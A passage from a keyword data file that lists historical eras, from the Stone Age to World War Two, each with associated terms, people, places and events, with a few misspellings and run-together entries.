"Old Stone",
"Middle Stone Age",
"New Stone Age",
"Parietal Art",
"Nomad"
],
"Ancient Mesopotamia": [
"Ancient Mesopotamia",
"Mesopotamia",
"Chalcolithic civilization",
"Chalcolithic",
"Mesopotamian cultures",
"Eridu economy",
"Eridu",
"invention of writing",
"Writing",
"Sumerian",
"Sumerian period",
"prehistorical Ubaid",
"Uruk periods",
"theocratic",
"casting",
"cuneiform",
"early civilisation"
],
"Bronze Age": [
"Bronze Age",
"prehistoric",
"metals",
"use of bronze",
"bronze technology",
"bronze alloy",
"bronze",
"tin mining",
"tin",
"foil",
"copper",
"molten copper",
"tools",
"smelting",
"trade",
"trade networks"
],
"Old Kingdom": [
"Old Kingdom",
"Ancient Egypt",
"Egypt",
"Age of Pyramids",
"Egyptian pyramid",
"Egyptian pyramids",
"pyramid",
"pyramids",
"Pyramid of Djoser",
"Great Pyramid at Giza",
"Great Pyramid of Giza",
"Pyramid of Khafre",
"Pyramid of Menkaure",
"Giza Pyramid",
"Giza Pyramid Complex",
"Giza Necropolis",
"Great Pyramid",
"Great Sphinx",
"scribes",
"hieroglyphs",
"dynasties",
"Third Dynasty",
"Fourth Dynasty",
"Fifth Dynasty",
"Sixth Dynasty",
"Seventh Dynasty",
"pharaohs",
"pharaoh",
"Sneferu",
"Khufu",
"trade",
"trade ships",
"nomes",
"nomarch",
"nomarchs",
"tombs",
"tomb",
"temples",
"temple",
"Egyptian gods",
"gods",
"early civilisation",
"polytheistic"
],
"Indus Valley Civilisation": [
"Indus Valley Civilisation",
"Indus script",
"Harappan Civilisation",
"Harappa",
"Harappan language",
"Mohenjo-daro",
"Dholavira",
"Ganeriwala",
"Rakhigarhi",
"Indus civilisation",
"Bronze Age",
"South Asia",
"Indus River",
"early civilisation"
],
"Middle Kingdom": [
"Middle Kingdom",
"Middle Kingdom of Egypt",
"Egypt",
"The Period of Reunification",
"Period of Reunification",
"ancient Egypt",
"Mentuhotep II",
"Nephepetre",
"Merneferre Ay",
"egyptian pharaohs",
"egyptian pharaoh",
"pharaohs",
"pharaoh",
"Eleventh Dynasty",
"Thebes",
"Twelfth Dynasty",
"el-Lisht",
"Thirteenth Dynasty",
"Eleventh Dynasty",
"Eleventh Dynasty",
"Dynasties",
"Osiris",
"deity",
"tombs",
"slavery",
"slaves",
"Egyptian gods",
"gods",
"polytheistic"
],
"Shang Dynasty": [
"Shang dynasty",
"Yin dynasty",
"dynasty",
"Chinese dynasty",
"China",
"traditional Chinese history",
"Yellow River",
"Ruins of Yin",
"Shang Capital",
"tombs",
"palaces",
"ritual sites",
"animal sacrifice",
"human sacrifice",
"jade",
"bronze",
"stone",
"bone",
"ceramic",
"artifacts",
"Anyang site",
"Chinese writing",
"divinations",
"oracle bones",
"chinese civilization"
],
"New Kingdom": [
"New Kingdom",
"New Kingdom of Egypt",
"Egypt",
"Egyptian Empire",
"ancient Eyptian history",
"ancient Egypt",
"Eighteenth Dynasty",
"Nineteenth Dynasty",
"Twentieth Dynasty",
"Ramesside period",
"Ramesses",
"Ramesses I",
"pharaohs",
"pharaoh",
"Hittite",
"Hittite armies",
"war",
"Kushites",
"polytheistic"
],
"Vedic Period": [
"Vedic period",
"Vedic age",
"India",
"Vedas",
"influential Brahmanical ideology",
"Brahmanical ideology",
"Kuru Kingdom",
"Indo-Aryan",
"Indo-Aryan tribes",
"Indo-Aryan culture",
"Vedic culture",
"patriarchal",
"patrilineal",
"Punjab",
"tribes",
"pastoralism",
"kingdoms",
"Srauta",
"Sruti",
"Vedic orthodoxy",
"orthodox sacrificial ritual",
"mahajanapadas",
"sramana",
"Jainism",
"Buddhism",
"hierarchy",
"social classes",
"Brahmanical orthodoxy",
"Hindu synthesis",
"Hinduism",
"Ochre Coloured Pottery culture",
"Gandhara grave culture",
"Swat culture",
"Swat protohistoric",
"Graveyards Complex",
"black and red ware culture",
"Painted Grey Ware culture"
],
"Zhou Dynasty": [
"Zhou Dynasty",
"Chinese Dynasty",
"China",
"Chinese History",
"Ji",
"Ji royal house",
"Western Zhou",
"Eastern Zhou",
"Spring and Autumn period",
"Warring States period",
"Qin state",
"Qin",
"Qin Dynasty",
"Chinese bronzeware",
"Confucianism",
"Ruism",
"Taoism",
"Daoism",
"Legalism",
"Fajia",
"written chinese",
"clerical script",
"chancery script",
"Warring States period"
],
"Iron Age": [
"Iron Age",
"prehistory",
"protohistory",
"iron",
"production of iron",
"production of steel",
"iron tools",
"tools"
],
"Ancient Greece": [
"Ancient Greece",
"civilization",
"Greek history",
"Greek Dark Ages",
"antiquity",
"classical antiquity",
"Classical Greece",
"Greco-Roman World",
"Mycenaean Greece",
"polis",
"poleis",
"Archaic period",
"Archaic Greece",
"colonization of the Mediterranean Basin",
"colonies in Antiquity",
"Greco-Persian Wars",
"Alexander the Great",
"Alexander III of Macedon",
"Hellenistic civilization",
"Hellenistic period",
"Hellenistic kings",
"conquests",
"conquest",
"Greece in the Roman era",
"Roman Greece",
"Achaea",
"Achaia",
"Greek culture",
"culture of Greece",
"Greek philosophy",
"foundation of modern Western culture",
"cradle of Western civilization",
"Greek architecture",
"Greek literature",
"first democracy",
"democracy",
"ecclesia",
"citizen's assembly",
"slavery",
"slaves",
"Homer",
"tragedy",
"lyric poet",
"lyric poetry",
"Greek gods",
"gods",
"polytheistic",
"Greek astronomy",
"Greek mathematics",
"ancient Greek medicine",
"ancient Greek technology"
],
"Jomon Period": [
"Jomon Period",
"Japanese prehistory",
"hunter-gatherer culture",
"hunter-gatherer",
"sedentism",
"jomon",
"tools",
"jewlery",
"bone",
"stone",
"shell",
"antler",
"pottery"
],
"Mahajanpadas": [
"Mahajanpadas",
"first republic",
"republic",
"Vajji",
"Vrijji",
"Mithila region",
"Mithila",
"Tirhut",
"TirabhuktiMahananda River",
"Vaishali",
"Vesali",
"Anga Kingdom",
"Pataliputra",
"Nanda clan",
"Magadha"
],
"Ancient Rome": [
"Ancient Rome",
"roman civilization",
"the Romans",
"romans",
"Rome",
"Western Roman Empire",
"Roman Kingdom",
"Roman Republic",
"Roman Empire",
"Italic people",
"Italic people settlement",
"one of the largest empires",
"largest empires",
"ancient world",
"Roman monarchy",
"regal period of ancient rome",
"elective monarchy",
"democratic",
"pure democracy",
"direct democracy",
"res publica",
"republic",
"classic republic",
"classical republicanism",
"civic humanism",
"autocracymilitary dictatorship",
"conquest",
"invasion",
"Romanization",
"Latinization",
"cultural assimilation",
"antiquity",
"classical antiquity",
"Greco-Roman World",
"Ancient Roman architecture",
"aqueductsRoman technology",
"Punic Wars",
"Siege of Carthage",
"Roman-Persian Wars",
"Roman-Parthian Wars",
"Trajan",
"mos maiorum",
"Republican mores and traditions",
"mores and traditions",
"Palmyrene Empire",
"Imperial Crisis",
"Crisis of the Third Century",
"Military Anarchy",
"Tetrarchy",
"Gaius Marius",
"Lucius Cornelius Sulla",
"Lucius Julius Caesar",
"Lucius Cornelius Cinna",
"Catilinarian conspiracy",
"Lucius Sergius Catilina",
"Catiline",
"Gaius Julius Caesar",
"First Triumvirate",
"Second Triumvirate",
"Quintus Tullius Cicero",
"Cicero",
"Julio-Claudian dynasty",
"Flavian dynasty",
"Nerva-Antonine dynasty",
"Severan dynasty",
"Augustus",
"Tiberus",
"Nero",
"Roman Egypt",
"Battle of Actium",
"polytheistic"
],
"Mayan Civilisation": [
"Mayan Civilisation",
"Maya civilization",
"Mesoamerican civilization",
"Maya peoples",
"Mayas",
"logosyllabic script",
"Maya script",
"Maya glyphs",
"pre-Columbian era",
"Ancient Maya art",
"Maya architecture",
"Maya numeral system",
"Maya calendar",
"Maya astronomy",
"Archaic period",
"Maya cities",
"city of Tikal",
"Tikal",
"city of Calakmul",
"Calakmul",
"Chichen Itza",
"Teotihuacan",
"classic Maya collapse",
"K'iche' kingdom",
"Nojpeten",
"Spanish Empire",
"mesoamerican pyramids",
"pyramid-temples",
"Maya pyramids",
"Maya stelae",
"human sacrifice",
"Maya culture"
],
"Yayoi Period": [
"Yayoi period",
"Yayoi",
"Yayoi pottery",
"paddy fields",
"intensive rice agriculture",
"rice agriculture",
"metallurgy",
"metal",
"artifacts",
"Yayoi culture",
"farmers",
"Yayoi People",
"bronze",
"iron"
],
"Moche Civilisation": [
"Moche Civilisation",
"Moche culture",
"Peru",
"autonomous polities",
"Moche architecture",
"Moche iconography",
"irrigation",
"metalwork",
"weaving",
"mold technology",
"ceramic art"
],
"Coptic Period": [
"Coptic Period",
"Roman Egypt",
"Byzantine Egypt",
"Egyptian culture",
"ancient Egyptian religion",
"polytheistic",
"Coptic Christianity",
"Coptic Orthodox Church",
"Muslim conquest of Egypt",
"decline of Christianity",
"Christianity",
"Islam"
],
"Kofun Period": [
"Kofun period",
"Yamato period",
"Japan",
"kofun",
"Buddhism",
"Chinese writing system",
"Imperial House"
],
"Gupta Empire": [
"Gupta Empire",
"Ancient Indian Empire",
"Ancient India",
"Golden Age of India",
"king Sri Gupta",
"Sri Gupta",
"Gupta",
"Chandragupta I",
"Samudragupta",
"Chandragupta II",
"Vikramaditya",
"Classical Sanskrit",
"Indic language",
"Indo-Aryan language",
"Kalidasa",
"conquests",
"Parasikas",
"Persians",
"Hunas",
"Huna",
"Kambojas",
"Kinnaras",
"Kiratas",
"Kirat",
"Mahabharata",
"Ramayana",
"Kalidasa",
"Aryabhata",
"Varahamihira",
"Vatsyayana",
"Puranas",
"invasions"
],
"Anglo Saxon Period": [
"Anglo Saxon Period",
"Anglo-Saxon Period",
"Romano-British leaders",
"Romano-British",
"Anglo-Saxon mercenaries",
"Anglo-Saxon",
"Old English",
"Anglo-Saxons",
"foederati",
"Flavius Aetius",
"British and Anglo-Saxon wars",
"Britons",
"Battle of Mount Badon",
"Battle of Mons Badonicus",
"Anglo-Saxon Chronicle",
"Migration period",
"Barbarian Invasions",
"Laws of Ine",
"co-existence",
"invasion",
"seven principal Anglo-Saxon kingdoms",
"seven Anglo-Saxon kingdoms",
"Anglo-Saxon kingdoms",
"Anglo-Saxon England heptarchy",
"heptarchy",
"Vikings",
"Great Heathen Army",
"Battle of Edington"
],
"Srivijaya Period": [
"Srivijaya Period",
"Sri Vijaya",
"Sriwijaya",
"Buddhist thalassocratic Indonesian empire",
"Indonesian empire",
"thalassocracy",
"thalattocracy",
"Buddhist",
"island of Sumatra",
"Sumatra",
"unified kingdom",
"Indonesian archipelago",
"islands of Indonesia",
"Srivijayan Empire",
"Maritime Silk Road",
"Maritime Silk Route",
"trade",
"Kedukan Bukit inscription",
"hegemon",
"hegemony",
"Javanese Singhasari empire",
"Majapahit empire"
],
"Chenla Kingdom": [
"Chenla",
"Chenla Kingdom",
"Zhenla",
"late 6th century",
"6th century",
"7th century",
"8th century",
"9th century",
"early 9th century",
"aristocracy",
"Dângrêk Chieftains",
"principalities",
"confederation of principalities",
"principality",
"conquests",
"Kingdom of Funan",
"Funana",
"martime trade routes",
"maritime trade",
"trade",
"epigraphic system",
"adoption of epigraphic system",
"Harihara",
"divine kingship",
"divine monarchy",
"Land Chenla",
"Water Chenla",
"Shailendra dynasty",
"thalassocracy",
"thalattocracy",
"Java",
"Srivijaya",
"Sumatra",
"Jayavarman II",
"Khmer Empire"
],
"Kingdom of the Sunda": [
"Kingdom of the Sunda",
"Sunda Kingdom",
"Sundanese Hindu kingdom",
"Pamali River",
"Serayu River",
"Pakuan Pajajaran",
"Sundanese",
"Tarumanagara",
"Sunda",
"Hinduism",
"king Tarusbawa",
"Tarusbawa",
"Sunda Kelapa"
],
"Golden Age of Islam": [
"Golden Age of Islam",
"Islam Golden Age",
"8th century",
"9th century",
"10th century",
"11th century",
"12th century",
"13th century",
"14th century",
"Abbasid Caliphate",
"Harun al-Rashid",
"House of Wisdom",
"Grand Library of Baghdad",
"Islamic scholars",
"polymaths",
"Arabic",
"Persian",
"Farsi",
"translated all of the world's classical knowledge",
"classical knowledge",
"world's classical knowledge",
"translation",
"Mongol invasions",
"Mongol invasions and conquests",
"conquests",
"Siege of Baghdad",
"Islamic middle ages",
"revolutionized",
"historic inventions",
"Timurid Renaissance",
"Timurid Empire"
],
"Nara Period": [
"Nara Period",
"Nara",
"Empress Genmei",
"Empress Genmyo",
"Heijo-kyo",
"Emperor Kanmu",
"Emperor Kammu",
"Nagaoka-kyo",
"Heian-kyo",
"Shintoism",
"Shinto",
"Kami-no-michi",
"agicultural",
"kami",
"Chinese influence",
"Chinese writing",
"Chinese fashion",
"Chinese Buddhism"
],
"Pala Empire": [
"Pala Empire",
"India",
"Pala",
"dynasty",
"Mahayana",
"Tantric",
"Buddhism",
"Gopala",
"emperor of Gauda",
"election of Gopala",
"war elephant",
"elephantry",
"military conquerors",
"diplomats",
"classical Indian philosophy",
"Indian philosophy",
"Indian literature",
"Indian painting",
"Indian sculpture",
"Somapura Mahavihara",
"Nalanda",
"university of Nalanda",
"Vikramashila",
"university of Vikramashila",
"Bengali",
"Bengala",
"trade",
"relations",
"Srivijaya Empire",
"Tibetan Empire",
"Abbasid Caliphate",
"Dharmapala",
"Emperor Dharmapala",
"Emperor Devapala",
"Devapala",
"Emperor Ramapala",
"Ramapala",
"Emperor Mahipala I",
"Sena dynasty",
"Sena empire",
"golden era",
"Bengali golden era",
"Charyapada"
],
"Kingdom of Mataram": [
"Kingdom of Mataram",
"Medang Kingdom",
"Mataram Kingdom",
"King Sanjaya",
"Sailendra dynasty",
"Sailendra",
"agriculture",
"rice culture",
"rice farming",
"maritime trade",
"trade",
"classical Javanese art",
"classical Javanese architecture",
"candi",
"Kalasan",
"Sewu",
"Borobudur",
"Prambanan",
"Buddhist",
"Shailendra dynasty",
"Balaputradewa",
"Shivaist",
"Sanjaya dynasty",
"Rakai Pikatan",
"civil wars",
"civil war",
"Medang Empire divided",
"division of Medang Empire",
"Wurawari",
"Watugaluh",
"Kahuripan kingdom",
"Airlangga"
],
"Viking Age": [
"Viking Age",
"Norsemen",
"Vikings",
"large-scale raiding",
"colonizing",
"colonized",
"colonization",
"conquest",
"trading",
"Scandinavians",
"Norse people",
"Varangians",
"Europe",
"North America",
"Norse-Gaels",
"Normans",
"Rus' people",
"Faroese",
"Icelanders",
"kingdoms",
"earldoms",
"kingdom of the Isles",
"Earldom of Orkney",
"York",
"Danelaw",
"Dublin",
"Duchy of Normandy",
"Kievan Rus'",
"Kyivan Rus",
"North Sea Empire",
"Anglo-Scandinavian Empire",
"unification of Norway",
"Carolingian Empire",
"Saxon Wars",
"Sailing innovations"
],
"Khmer Empire": [
"Khmer Empire",
"Angkor Empire",
"Khmer people",
"Hindu",
"Buddhist",
"Hindu-Buddhist Empire",
"Funan Empire",
"Chenla Empire",
"Angkor",
"City of Angkor",
"Angkor Wat",
"Bayon",
"largest pre-industrial urban centre",
"pre-industrial urban centre",
"King Jayavarman II",
"chakravartin",
"universal ruler"
],
"Chimu Culture": [
"Chimu culture",
"Chimor",
"Chan Chan",
"Moche Valley",
"Valley of Moche",
"Late Intermediate Period",
"Peru",
"Agriculture",
"fishing",
"Chimu economy",
"Moon Worshipping",
"chimu",
"Spondylus shells",
"copper",
"gold",
"silver",
"bronze",
"tumbaga",
"kiln"
],
"Medieval Period": [
"Medieval Period",
"Middle Ages",
"Europe",
"fall of the Western Roman Empire",
"Early Middle Ages",
"High Middle Ages",
"Late Middle Ages",
"Migration Period",
"monastary",
"Christians",
"Christian",
"Christianization",
"christianise",
"pagan Europe",
"pagan",
"Franks",
"Carolingian dynasty",
"Carolingian Empire",
"Vikings",
"Vikings invasion",
"Magyars",
"hungarian invasions",
"Magyar invasions",
"Saracens",
"Saracen invasions",
"trade",
"technological innovations",
"agricultural innovations",
"Medieval Warm Period",
"Medieval Climate Optimum",
"Medieval Climatic Anomaly",
"Manorialism",
"seignoralism",
"nobles",
"noble",
"peasant",
"peasants",
"feudalism",
"knight",
"knights",
"knighthood",
"crusades",
"crusade",
"Holy land",
"muslims",
"Christendom",
"scholasticism",
"Thomas Aquinas",
"paintings of Giotto",
"Giotto",
"Giotto di Bondone",
"poetry of Dante",
"Dante Alighieri",
"Dante",
"poetry of Chaucer",
"Geoffrey Chaucer",
"Chaucer",
"Marco Polo",
"Gothic architecture",
"Gothic",
"Chartres Cathedral",
"Cathedral of our Lady of Chartres",
"famine",
"plague",
"Black Death",
"war",
"heresy",
"Western Schism",
"Papal Schism",
"Great Occidental Schism",
"Schism of 1378",
"Catholic Church",
"Roman Catholic Church",
"interstate conflict",
"civil strife",
"peasant revolts",
"revolt",
"revolts"
],
"Kediri Empire": [
"Kediri Empire",
"Kediri Kingdom",
"Kadiri",
"Kediri",
"Panjalu",
"Hindu Javanese Kingdom",
"Kakawin Bharatayuddha",
"Gatotkacasraya",
"Mpu Dharmaja",
"Mpu Panuluh",
"Mpu Sedah",
"Smaradhana",
"Javanese litterature",
"Airlangga",
"Janggala",
"Kertajaya",
"Ken Arok of Tumapel",
"Kediri kings",
"Majapahit period"
],
"Ottoman Empire": [
"Ottoman Empire",
"Ottoman caliphate",
"Ottomans",
"Ottoman",
"caliphate",
"Turkoman tribal leader Osman I",
"tribal leader Osman I",
"Osman I",
"Turkic origin",
"turkic",
"Persianised",
"Persianate society",
"conquest of the Balkans",
"Balkans",
"Ottoman beylik",
"Anatolian beyliks",
"1453 conquest of Constantinople",
"conquest of Constantinople",
"Constantinople",
"Mehmed the Conqueror",
"Mehmed II",
"Suleiman the Magnificent",
"Suleiman I",
"Kanuni sultan suleyman",
"Ottoman military system",
"Habsburg",
"Habsburg Monarchy",
"Russian empire",
"Imperial Germany",
"Imperial State of Germany",
"German empire",
"Armenians Genocide",
"Assyrians Genocide",
"Sayfo",
"Seyfo",
"Greeks Genocide",
"Pontic Genocide",
"Arab Revolt",
"Great Arab Revolt"
"World War I",
"Great War",
"First World War",
"Central Powers",
"Central Empires",
"Quadruple Alliance",
"partition of the Ottoman Empire",
"Ottoman Empire partitioning",
"Sykes Picot Agreement",
"Abolition of the Ottoman monarchy",
"Turkish War of Independance",
"Mustafa Kemal Atatürk",
"Kemal Atatürk",
"aftermath of World War I",
"World War I defeat"
],
"Renaissance": [
"Renaissance",
"Europe",
"Modernity",
"Crisis of the Late Middle Ages",
"social change",
"early modern period",
"humanism",
"Roman Humanitas",
"classical Greek philosophy",
"Protagoras",
"Renaissance art",
"oil painting",
"Dante",
"paintings of Giotto",
"Giotto",
"Giotto di Bondone",
"poetry of Dante",
"Dante Alighieri",
"Renaissance architecture",
"linear perspective",
"natural reality",
"educational reform",
"Renaissance politics",
"customs",
"conventions of diplomacy",
"Renaissance science",
"observation",
"inductive reasoning",
"Renaissance literature",
"Latin",
"vernacular literature",
"Renaissance man",
"social upheaval",
"political upheaval",
"Petrarch",
"polymaths",
"da Vinci",
"Leonardo da Vinci",
"Michelangelo",
"Florence",
"Italy",
"Medici",
"Greek scholars",
"migration",
"Fall of Constantinople",
"Timurid Renaissance",
"Renaissance papacy",
"Italian Renaissance",
"cultural advance"
],
"Age of Discovery": [
"Age of Discovery",
"Age of Exploration",
"overseas exploration",
"discovery of the Americas",
"beginning of globalization",
"globalization",
"colonialism",
"mercantilism",
"invaders",
"unknown continents",
"unknown",
"Portuguese discoveries",
"Atlantic archipelagos",
"Madeira",
"Azores",
"Coast of Africa",
"Africa",
"Portuguese discovery of the sea route to India",
"sea route to India",
"Crown of Castile",
"trans-Atlantic voyages",
"Christopher Columbus",
"Columbus",
"Magellan-Elcano circumnavigation",
"circumnavigation",
"Ferdinand Magellan",
"Magellan",
"Juan Sebastián Elcano",
"Elcano",
"Enrique of Malacca",
"Malacca",
"naval expedition",
"naval expeditions",
"land expeditions",
"land expedition",
"expedition",
"expeditions",
"polar explorations",
"polar exploration",
"global trade",
"international trade",
"colonial empire",
"Old World",
"New World",
"Columbian exchange",
"Columbian interchange",
"slaves",
"slavery",
"slave",
"enslavement",
"communicable disease",
"infectious disease",
"transmissible disease",
"Major explorations",
"European explorations",
"mapping of the world",
"world cartography",
"new worldview",
"distant civilization",
"exploitation",
"military conquest",
"economic dominance",
"native population",
"native population",
"native",
"natives",
"missionary",
"Christian mission",
"Christianity"
],
"Sengoku Period": [
"Sengoku Period",
"civil war",
"social upheaval",
"political intrigue",
"Onin War",
"feudal system",
"feudalism",
"collapse of feudal system",
"Ashikaga Shogunate",
"Muromachi Shogunate",
"samurai warlords",
"samurai",
"samurai rule",
"Ikko-ikki",
"Nanban trade",
"Nanban trade period",
"tributary state of China",
"Cefeng system",
"Oda Nobunaga",
"Great unifier",
"Ishiyama Hongan-ji War",
"Honnō-ji Incident",
"Toyotomi Hideyoshi",
"Japanese invasions of Korea",
"Japanese invasions",
"Tokugawa Ieyasu",
"Toyotomi Hideyori",
"Battle of Sekigahara",
"Tokugawa Shogunate",
"Toyotomi loyalists",
"Siege of Osaka"
],
"Aztec Empire": [
"Aztec Empire",
"Nahua altepetl",
"Nahua altepetl city-states",
"Mexico-Tenochtitlan",
"Texcoco",
"Tlacopan",
"Valley of Mexico",
"Spanish conquistadores",
"Hernán Cortés",
"civil war",
"Azcapotzalco",
"Tenochtitlan",
"conquest",
"Mesoamerica",
"Xoconochco province",
"hegemonic",
"indirect",
"semi-annual tribute",
"tribute",
"local autonomy",
"military forces",
"polytheistic",
"deities",
"Huitzilopochtli",
"imperial cult",
"local pantheons"
],
"Inca Empire": [
"Inca Empire",
"Incan Empire",
"Inka Empire",
"Inca emperor",
"Topa Inca Yupanqui",
"Tupac Inca Yupanqui",
"pre-Columbian America",
"Cusco",
"Inca civilization",
"Western South America",
"Andean Mountains",
"Quechua",
"Huacas",
"sun worship",
"Inti",
"sun god",
"Pachamama",
"Sapa Inca"
],
"Tudor Period": [
"Tudor Period",
"Elizabeth Period",
"House of Tudor",
"Henry VII",
"Henry VIII",
"Edward VI",
"Mary I",
"Elizabeth I"
],
"Reformation": [
"Reformation",
"Protestant Reformation",
"European Reformation",
"Western Christianity",
"Catholic Church",
"Roman Catholic Church",
"papal authority",
"errors",
"abuses",
"discrepancies",
"Protestantism",
"schism",
"split from Roman Catholic Church",
"religious split",
"Holy Roman Empire",
"Edict of Worms",
"Ninety-five Theses",
"Martin Luther",
"Counter-Reformation",
"Catholic Reformation",
"Catholic Revival"
],
"Mughal Empire": [
"Mughal Empire",
"Mughal imperial structure",
"Mogul Empire",
"Gurkani",
"Babur",
"tribal chief",
"chieftain",
"Safavid Empire",
"Safavid",
"Ottoman empire",
"Sultan of Delhi",
"Ibrahim Lodhi",
"First Battle of Panipat",
"Akbar",
"Aurangzeb",
"Mughal emperor",
"Agra Fort",
"Fatehpur Sikri",
"Red Fort",
"Humayun's Tomb",
"Lahore Fort",
"Shalamar Gardens",
"Taj Mahal",
"jewel of Muslim art",
"Shah Jahan"
],
"Elizabethan Age": [
"Elizabethan Age",
"Elizabethan Era",
"Tudor Period",
"Queen Elizabeth I",
"Queen Elizabeth I of England",
"Golden Age",
"English Renaissance",
"William Shakespeare",
"Shakespeare",
"Protestant Reformation",
"Reformation",
"English Reformation",
"Elizabethan Religious Settlement",
"Anglo-Spanish War",
"Philip II of Spain",
"Spanish Armada",
"English Armada",
"Drake-Norris Expedition",
"Drake-Norris Expedition of 1589",
"1589 Drake-Norris Expedition",
"Treaty of London",
"Mary I of Scotland",
"Mary Stuart",
"Mary, Queen of Scots",
"Mary, Queen of Scotland",
"Rising of the North",
"Babington Plot",
"James I",
"James I of England",
"James VI of Scotland",
"Auld Alliance",
"John Knox",
"Mary of Guise",
"Mary of Loraine",
"Catholicism",
"ProtestantismTreaty of Edinburgh",
"1560 Treaty of Edinburgh",
"Treaty of Edinburgh of 1560"
],
"Stuart Period": [
"Stuart Period",
"House of Stuart",
"Grand Remonstrance",
"Declaration of Breda",
"Treaty of Ryswick",
"Anglo-Dutch War",
"Act of Settlement",
"Great Fire of London",
"First Anglo-Dutch War",
"personal rule",
"Gunpowder Plot",
"Short Parliament",
"Long Parliament",
"Second English Civil War",
"Glorious Revolution",
"Monmouth Rebellion",
"Titus Oates",
"Bloody Assizes",
"Battle of Sedgemoo",
"English Act of Settlement",
"War of the Spanish Succession",
"English Civil War",
"Immortal Seven",
"Battle of the Boyne",
"Revolution of 1688",
"Rye House Plot",
"Third Anglo-Dutch War",
"Second Anglo-Dutch War",
"Treaty of Utrecht",
"Act of Union",
"Pacification of Berwick",
"Nine Years' War",
"Exclusion Crisis",
"Act of Uniformity",
"Restoration",
"Book of Common Prayer",
"United Kingdom",
"Great Britain",
"George Villiers",
"Queen Anne",
"James I",
"James I of England",
"James VI of Scotland",
"James II",
"Charles II",
"James VI",
"Charles I",
"Catherine of Braganza",
"William Laud",
"Richard Cromwell",
"William of Orange",
"Thomas Wentworth",
"Mary II",
"William III",
"Berwick",
"Aphra Behn",
"Mary of Modena",
"James Francis Edward Stuart",
"JacobitesJacobean Era",
"Caroline Era",
"Whigs"
],
"Tokugawa Shogunate": [
"Tokugawa Shogunate",
"Tokugawa PeriodEdo Period",
"Edo Bakufu",
"Tokugawa Leyasu",
"Battle of Sekigahara",
"Shogun",
"Tokugawa clan",
"Edo Castle",
"daimyo",
"samurai",
"Edo Society",
"Tokugawa class system",
"isolationist policies",
"Sakoku",
"feudal system",
"han",
"ukiyo culture",
"urbanization",
"Bakumatsu",
"Imperial Court",
"Imperial Court in Kyoto",
"Meiji Restoration",
"Honorable Restoration",
"Revolution Reform",
"Meiji Renovation",
"Renewal"
],
"Age of Enlightenment": [
"Age of Enlightement",
"Age of Reason",
"The Englightment",
"Enlightement principles",
"Scientific Revolution",
"Knowledge",
"Development of ideals",
"philosophers",
"Philosophy",
"philosophes",
"Western philosophy",
"Eastern philosophy",
"Religious philosophy",
"tolerance",
"civil liberties",
"civil liberty",
"scientific method",
"reductionism",
"intellectualism",
"reason",
"deist movement",
"deism",
"skepticism",
"Enlightenment political thought",
"democratic values",
"liberal democracies",
"democracy",
"social contract",
"social contract theory",
"intellectual culture",
"enlightement thinkers",
"thinkers",
"classical liberalism",
"liberal thought",
"liberal",
"equality",
"equality before law",
"natural rights",
"rights",
"general will",
"Life, Liberty and Property",
"capitalism",
"consent of the governed",
"Declaration of the Rights of Man and of the Citizen",
"John Locke",
"Locke",
"Jean-Jacques Rousseau",
"Rousseau",
"Voltaire",
"Francois-Marie Arouet",
"Thomas Hobbes",
"Leviathan",
"Two Treatises of Government",
"Discourse on Inequality",
"inequality",
"enlightened absolutism",
"Seven Years' War",
"War of the Austrian Succession",
"Diplomatic Revolution",
"Diplomatic Revolution of 1756",
"1756 Diplomatic Revolution",
"American Revolutionary War",
"American War of Independence",
"Women's March on Versailles",
"October March",
"October Days",
"March on Versailles",
"1789 March on Versailles",
"1789 October March",
"abolition of feudalism",
"jacobins",
"girondins",
"montagnards",
"French Revolution",
"1789 French Revolution",
"French Revolution of 1789",
"political revolution",
"Attack on Bastille",
"Bastille Day",
"Storming on Bastille",
"sans-culottes",
"French Revolutionary wars",
"Insurection of 10 August 1792",
"1792 insurection",
"1793 insurection",
"Robespierre",
"Maximilien Robespierre",
"Reign of Terror",
"The Terror",
"Fall of Maximilien Robespierre",
"Fall of Robespierre",
"Coup d'Etat of 9 Thermidor",
"Thermidorian Reaction",
"Coup d'Etat",
"Battle of Valmy"
],
"Industrial Revolution": [
"Industrial Revolution",
"First Industrial Revolution",
"Second Industrial Revolution",
"Techonlogical Revolution",
"factories",
"factors of production",
"production",
"factory",
"mechanization",
"industrialization",
"mass-production",
"assembly lines",
"Bessemer process",
"steel making process",
"invention",
"innovation",
"Transportation",
"Agriculture",
"Steam Power",
"Textile Industry",
"textile manufacturing",
"Mining Industry",
"Iron Industry",
"machine",
"Labor conditions",
"technological developments",
"social change"
],
"Georgian Period": [
"Georgian Era",
"Georgian Period",
"Augustan litterature",
"Georgian Architecture",
"George I",
"George II",
"George III",
"George IV",
"William IV"
],
"Victorian Age": [
"Victorian era",
"Victorian age",
"Representation of the People Act 1832",
"Crimean War",
"British Empire",
"Belle Epoque",
"Great Game",
"Great Hunger",
"Great FamineReform Act 1832",
"Pax Britanica",
"Queen Victoria"
],
"Edwardian Period": [
"Edwardian era",
"Edwardian Period",
"Liberals",
"fashion",
"United Kingdom general election",
"Liberal welfare reforms",
"New Poor law",
"1834 Poor Law",
"suffragette",
"woman's suffrage",
"George V",
"Edward VII"
],
"World War One": [
"World War One",
"WWI",
"WW1",
"Triple Alliance",
"Western Front",
"Alpine Front",
"Triple Entente",
"Eastern Front",
"tranchee",
"Verdun",
"Battle of Verdun",
"First Battle of the Marne",
"Second Battle of the Marne",
"Battle of Somme",
"Second Battle of SommeBalkans Theater",
"Great October Socialist Revolution",
"Bolshevik Revolution",
"October Uprising",
"Red October",
"October Revolution",
"Bolshevik Party",
"Bolshevik",
"Treaty of Brest-Litvosk",
"Armistice of Compiegne",
"Paris Peace Conference",
"Armistice of 11 November 1918",
"Versailles Treaty"
],
"Inter War Years": [
"Interwar period",
"interwar",
"between the wars",
"roaring twenties",
"Golden Twenties",
"Women's suffrage",
"Great Depression",
"Annees Folles",
"Weimar Republic",
"German Reich",
"fascism",
"USSR",
"Russian Civil War",
"Great Purge",
"Great Terror",
"Year 1937",
"Gulag",
"forced-labor",
"forced labor",
"labor camp",
"POW",
"prisoner of warWashington Naval Treaty",
"Five-Power Treaty",
"Spanish Civil War",
"Chinese Civil War",
"Francisco Franco",
"Franco",
"Joseph Stalin",
"Stalin",
"Lenin",
"Vladimir ILyich Ulyanov"
],
"World War Two": [
"Second World War",
"World War Two",
"WW2",
"World War II",
"WWII",
"Western Front",
"Allies",
"Allies powers",
"Allied Invasion",
"Axis",
"Axis powers",
"Eastern Front",
"Great Patriotic War",
"German Army",
"German Reich",
"Third Reich",
"Nazi Germany",
"Nazi Party",
"Nazi",
"Wehrmacht",
"Gestapo",
"SS",
"Schutzstaffel",
"Wannsee Conference",
"fascism",
